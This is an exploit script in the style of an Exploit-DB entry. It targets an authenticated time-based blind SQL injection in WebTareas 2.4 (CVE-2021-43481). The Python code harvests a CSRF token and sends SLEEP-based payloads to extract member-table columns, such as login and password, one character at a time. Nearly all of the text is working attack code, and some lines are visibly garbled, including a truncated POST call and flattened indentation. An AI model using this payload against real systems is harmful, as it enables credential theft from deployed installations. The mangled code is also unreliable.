# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)  
# Date: 04/20/2022  
# Exploit Author: Behrad Taher  
# Vendor Homepage:  
# Version: < 2.4p3  
# CVE : CVE-2021-43481  
#The script takes 3 arguments: IP, user ID, session ID  
#Example usage: python3 1 4au5376dddr2n2tnqedqara89i  
import requests, time, sys  
from bs4 import BeautifulSoup  
ip = sys.argv[1]  
id = sys.argv[2]  
sid = sys.argv[3]  
def sqli(column):  
print("Extracting %s from user with ID: %s\n" % (column,id))  
extract = ""  
for i in range (1,33):  
#This conditional statement will account for variable length usernames  
if(len(extract) < i-1):  
for j in range(32,127):  
injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j)  
url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip  
GET_cookies = {"webTareasSID": "%s" % sid}  
r = requests.get(url, cookies=GET_cookies)  
#Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token"  
token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value']  
#Because this is an authenticated vulnerability we need to provide a valid session token  
POST_cookies = {"webTareasSID": "%s" % sid}  
POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection}  
start = time.time(), cookies=POST_cookies, data=POST_data)  
end = time.time() - start  
if end > 5:  
extract += chr(j)  
print ("\033[A\033[A")  
#Modularized the script for login and password values